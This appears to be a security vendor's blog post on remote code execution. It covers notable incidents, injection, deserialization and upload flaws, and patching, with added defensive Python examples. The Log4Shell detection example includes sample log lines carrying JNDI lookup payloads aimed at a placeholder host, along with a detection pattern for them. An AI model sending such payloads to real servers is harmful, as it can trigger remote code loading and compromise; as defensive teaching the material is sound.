
The Continuing Risk of Remote Code Execution

RCEs are having a moment, and their continued rise poses real cyber risk to organizations across the globe.

There were nearly 29,000 vulnerabilities published in 2023, 3,800 more than in 2022. More troubling than the sheer volume of vulnerabilities in 2023 is that over half of them were given a CVSS score indicating high or critical severity — an increase of 57% YoY.
However, not all vulnerabilities become go-to attack vectors for cybercriminals, and security professionals can’t remediate every vulnerability that is published. The objective becomes prioritization: identifying the vulnerabilities that are most dangerous and potentially damaging.

And one type has risen to the forefront: remote code execution (RCE).

According to Arctic Wolf Labs, nine of the top 10 vulnerabilities of 2023 were RCEs. These nine vulnerabilities were found in 42% of all engagements with Arctic Wolf Incident Response and, with the continued adoption of the cloud and the ubiquity of hybrid work models, we only expect these types of vulnerabilities to grow in number and severity.


What is Remote Code Execution?

Often launched directly from the internet, remote code execution gives the attacker the ability to take control of a process or device and run their own code remotely, without needing to be in the same physical space as the system or device. This distinguishes it from arbitrary code execution (ACE), which is launched from within a system’s local area network (LAN). Through remote code execution, an attacker can run code from outside the system that triggers an internal ACE.

Once an attacker successfully exploits an RCE vulnerability, they can potentially take complete control over the target system, allowing them to steal sensitive data, disrupt operations, or launch further attacks.

Infamous RCE Attacks

WannaCry
Perhaps the most insidious of all ransomware strains, WannaCry brought ransomware into the mainstream in 2017. The WannaCry ransomware worm spread by exploiting a vulnerability in the Server Message Block (SMB) protocol. This vulnerability allowed an attacker to execute malicious code on vulnerable machines, enabling the ransomware to access and encrypt valuable files. WannaCry managed to affect more than 200,000 Windows computers in 150 countries. It was especially dangerous — and potentially deadly — as the UK’s National Health Service hospitals were among the most devastated. The Five Eyes alliance — an intelligence alliance consisting of Australia, Canada, New Zealand, the United Kingdom, and the United States — has attributed the attack to North Korean threat actors.

SolarWinds
In one of the most catastrophic data breaches of 2020, the Russian SVR leveraged a zero-day RCE vulnerability in the SolarWinds Orion Platform to deploy malware across an estimated 18,000 private and government affiliated networks, gaining access to an abundance of identifiable information, including source code, passwords, financial information, and usernames.

Log4j / Log4Shell
In early December 2021, Log4Shell (CVE-2021-44228) was first identified as a zero-day remote code execution vulnerability in Apache Log4j 2. An unauthenticated, remote threat actor could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of Log4j. Arctic Wolf Labs observed one in four organizations in our customer base were targeted with Log4Shell exploitation attempts between January and December of 2022. Log4Shell exploitation was the root point of compromise in 11% of all Arctic Wolf® Incident Response cases in 2022 for customers where incident response services were the customer’s first engagement with Arctic Wolf.

Spring4Shell
In late March 2022, Spring published a security advisory confirming Spring4Shell, a remote code execution (RCE) vulnerability in the Spring Framework. In addition to the security advisory, Spring released patches addressing the vulnerability. The vulnerability, assigned CVE-2022-22965, received a critical severity rating. Notably, the vulnerability impacted not only Spring MVC but also Spring WebFlux applications running JDK 9+. Threat actors were able to leverage this vulnerability to deploy cryptominers and botnet malware into environments.

RCE attacks are continuing at alarming rates. In fact, in September 2024, Arctic Wolf Labs observed the notorious Akira ransomware group utilizing a specific RCE vulnerability exploit (CVE-2024-40766) as their initial access method for ransomware attacks on multiple organizations.

How Remote Code Execution Works

RCE vulnerabilities allow an attacker to execute arbitrary code on a remote system. This means that an attacker can gain unauthorized access to a system and execute commands or run programs remotely, without having or needing physical access to the target system.

It has become such a popular vulnerability type to exploit because it gives threat actors initial access into a target network without the need to, for example, carry out an identity-based attack like social engineering to obtain valid credentials that would provide that same initial access. With RCE, threat actors can remotely enter a network without relying on credentials at all.

There are several ways a threat actor can achieve remote code execution, including:

Injection
An injection exploit executes malicious queries to take control of a database server that is running a web application. For instance, in a SQL injection, the threat actor injects malicious data the system interprets as a command, allowing them to bypass authentication and authorization of the app to retrieve data from the entire SQL database. It can also be used to add, modify, or delete data from the database.

SQL injection is commonly used (Arctic Wolf saw a 125% increase in indicators of SQL activity in November 2023) because tools like sqlmap offer a low-effort way into an environment with little resistance and little chance of detection.

Deserialization
Serialization is the transformation of an object — say a file folder — into a format that can be preserved, stored, and transmitted, much in the way a .zip file allows you to send a folder containing multiple files as a single unit. Deserialization, then, is the process of undoing that transformation so that the object can be read and/or executed. However, if the deserialized object is unencrypted, threat actors can modify it with malicious code, which leads to unauthenticated RCE.
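One way to keep deserialization of untrusted data from resolving code, as an added example that is not part of the original post. It uses Python's pickle, whose default loader will resolve any module-level reference a stream names; the restricted loader below refuses every such reference unless it is on an allow-list, and JSON is shown as the format to prefer when only plain data has to cross a trust boundary. The sample streams are constructed here.

```python
import io
import json
import os
import pickle

# Allow-list of (module, name) pairs the unpickler may resolve. Plain data
# (dict, list, str, int, ...) is encoded by the pickle protocol itself and
# never goes through find_class, so an empty allow-list still loads it.
SAFE_GLOBALS = set()

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every reference to a module-level object passes through here.
        # Refusing anything outside the allow-list is what stops a crafted
        # stream from choosing which code runs when it is loaded.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name} from untrusted pickle")

def load_untrusted_pickle(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def load_untrusted_json(data: bytes):
    # JSON cannot express code references at all, which is why it is the
    # safer wire format whenever plain data is all that has to be exchanged.
    return json.loads(data)

def demo():
    plain = pickle.dumps({"user": "alice", "roles": ["viewer"]})
    # A stream that references a module-level function. os.getcwd is
    # harmless, but the loader cannot know that; any global reference means
    # the stream, not the application, decides what gets resolved on load.
    with_global = pickle.dumps(os.getcwd)
    results = {"plain": load_untrusted_pickle(plain)}
    try:
        load_untrusted_pickle(with_global)
        results["global"] = "loaded"
    except pickle.UnpicklingError:
        results["global"] = "rejected"
    return results

if __name__ == "__main__":
    print(demo())
```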

Out-of-Bounds Write
In this exploit, a threat actor leverages incorrect memory allocation in software to write data beyond the boundaries of a buffer — a temporary data storage location used while data is in transfer — which leads to the execution of arbitrary code.

Improper Input Validation
When software applications do not properly sanitize user input, it can allow attackers to upload a file containing malicious code, which the application then executes, believing it to be valid.
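An input-validation routine for file uploads, as an added example that is not part of the original post. It allow-lists extensions, checks that the file's leading bytes agree with the claimed type, discards any path components in the client-supplied name, and stores the file under a server-chosen random name. The allowed types, size limit and sample inputs are assumptions made for the example.

```python
import os
import secrets

# Allow-list of extensions and the magic bytes each must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024

def validate_upload(filename: str, content: bytes):
    """Return (True, extension) when the upload is acceptable, else (False, reason)."""
    # Use only the final path component so "../" or nested paths in the
    # client-supplied name can never influence where the file is written.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} is not allowed"
    if len(content) > MAX_BYTES:
        return False, "file too large"
    # The extension is attacker-controlled; the bytes must agree with it.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, f"content does not match {ext}"
    return True, ext

def store_upload(filename: str, content: bytes, upload_dir: str) -> str:
    """Write an accepted upload under a random name and return its path.

    upload_dir should live outside the web root (or be served with execution
    disabled) so that even a valid-looking image is never run as code."""
    ok, detail = validate_upload(filename, content)
    if not ok:
        raise ValueError(detail)
    stored = os.path.join(upload_dir, secrets.token_hex(16) + detail)
    with open(stored, "wb") as fh:
        fh.write(content)
    return stored
```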

The important thing to note is that remote code execution is possible in any computer software or application and is not restricted by programming languages or operating systems. This is another reason why RCE exploits have risen so sharply in the past few years, with no signs of slowing down.

No two RCEs are the same, and some vulnerabilities, like Spring4Shell, offer multiple avenues for threat actors to take. It depends on the specifics of the vulnerability and the application affected by it.

How To Defend Against Remote Code Execution

One of the primary ways to prevent RCE is through timely software updates and patches. As vulnerabilities are discovered in software or an application, the companies behind them will release updates or patches to users. Ensuring that you’re staying on top of this and keeping your software and applications current will help reduce the risk of RCE.

Another effective — and more proactive — method of preventing RCE is a risk-based vulnerability management program. Most critical severity CVEs that are discovered lead to RCE, so it’s important to scan for vulnerabilities in your environment and stay on top of your patching schedule.

Because every organization has different security and business needs that can change, the goal with vulnerability management should not be to eliminate every possible vulnerability, but to take a risk-based approach that reduces risk over time.
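A small illustration of the risk-based prioritisation argued for above, as an added example that is not part of the original post and not Arctic Wolf's method. It weights a finding's CVSS score by whether it yields RCE, whether exploitation has been observed, whether the asset is internet-facing, and how critical the asset is; the weights and the findings (with placeholder CVE ids) are constructed for the example.

```python
from dataclasses import dataclass

@dataclass
class Finding:
    cve: str
    cvss: float             # CVSS base score, 0-10
    rce: bool               # does the weakness yield remote code execution?
    known_exploited: bool   # exploitation observed in the wild or in IR casework
    internet_facing: bool   # is the affected asset reachable from the internet?
    asset_criticality: int  # 1 (lab box) .. 5 (crown-jewel system)

def risk_score(f: Finding) -> float:
    """Combine severity with real-world exploitability and exposure.

    The additive weights are assumptions for the example; the point is that
    an RCE already being exploited on an exposed, critical asset outranks a
    higher CVSS score on an isolated, low-value one."""
    score = f.cvss
    if f.rce:
        score += 2.0
    if f.known_exploited:
        score += 3.0
    if f.internet_facing:
        score += 2.0
    return round(score * f.asset_criticality / 5, 2)

def prioritise(findings):
    """Return findings ordered from most to least urgent."""
    return sorted(findings, key=risk_score, reverse=True)

# Constructed findings, not real scan output; the CVE ids are placeholders.
SAMPLE = [
    Finding("CVE-0000-0001", 9.8, rce=True,  known_exploited=True,  internet_facing=True,  asset_criticality=4),
    Finding("CVE-0000-0002", 9.1, rce=False, known_exploited=False, internet_facing=False, asset_criticality=2),
    Finding("CVE-0000-0003", 7.5, rce=True,  known_exploited=True,  internet_facing=False, asset_criticality=5),
    Finding("CVE-0000-0004", 5.3, rce=False, known_exploited=False, internet_facing=True,  asset_criticality=1),
]

if __name__ == "__main__":
    for f in prioritise(SAMPLE):
        print(f"{f.cve}  cvss={f.cvss:<4} risk={risk_score(f)}")
```

Note how the 7.5-score RCE that is already being exploited on a critical asset ranks above the 9.1-score finding on an isolated, low-value one.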

Learn how Arctic Wolf, and Arctic Wolf Labs, helps organizations stay on top of CVEs and other vulnerability-based threats.

Additionally, being able to detect malicious actions, including possible RCE exploits, in real time and respond to them swiftly is paramount for overall protection. Because not every vulnerability can be patched, having a monitoring system in place can help your organization detect an attempted exploitation before it takes hold and a cyber attack truly begins.
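The kind of detection the paragraph above calls for, as an added example that is not part of the original post: a scan of web server access logs for the JNDI lookup string that Log4Shell exploitation attempts carry, with per-client counting so repeated attempts stand out. The Apache-style log lines are constructed for the example and point at a placeholder host.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache-style access log lines (not real traffic). The first is
# benign; the other two carry a JNDI lookup string, once raw in the
# User-Agent field and once URL-encoded in a query parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:13:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/a}"
203.0.113.9 - - [10/Dec/2021:13:01:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"
"""

# ${jndi:<scheme>:...} with the scheme captured for the alert text.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
_CLIENT = re.compile(r"^(\S+) ")

def find_jndi(line: str):
    """Return the lookup scheme (ldap, rmi, dns, ...) if the line carries a JNDI lookup, else None."""
    # Request paths arrive percent-encoded; decode twice so a double-encoded
    # parameter is matched as well.
    decoded = unquote(unquote(line))
    m = _JNDI.search(decoded)
    return m.group(1).lower() if m else None

def scan_log(text: str):
    """Return ([(client, scheme, line_no), ...], Counter of hits per client)."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        scheme = find_jndi(line)
        if scheme is None:
            continue
        client = _CLIENT.match(line)
        hits.append((client.group(1) if client else "?", scheme, no))
    return hits, Counter(h[0] for h in hits)

if __name__ == "__main__":
    hits, per_client = scan_log(SAMPLE_LOG)
    for client, scheme, no in hits:
        print(f"line {no}: JNDI {scheme} lookup attempt from {client}")
    print(dict(per_client))
```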

When To Partner With a Third Party

Many IT and security teams struggle under a lack of budget and a shortage of available security experts, meaning that providing 24×7 monitoring of their entire environment, as well as prompt detection and response, is already challenging to achieve in-house. Viewed through that lens, adding proactive vulnerability and risk management to that workload is an additional burden that often falls by the wayside.

That’s when partnering with a security operations solutions provider can provide valuable assistance in determining your organization’s unique risk appetite — the amount of risk you’re willing to take on to conduct business — as well as patching and mitigating the vulnerabilities that are most dangerous to your organization and providing 24×7 monitoring, detection, and response solutions.

A managed security operations provider like Arctic Wolf not only offers visibility and response from a seasoned team of security experts but also works to discover and assess the risks, vulnerabilities included, by contextualizing your attack surface coverage across your various environments, helping you implement effective vulnerability management while improving your overall security posture and reducing your risk.

Learn more about the vulnerabilities your organization needs to look out for in the Arctic Wolf 2024 Security Operations Report.
See what other organizations are concerned about, and the steps they’re taking to reduce risk, with The State of Cybersecurity: 2024 Trends Report.
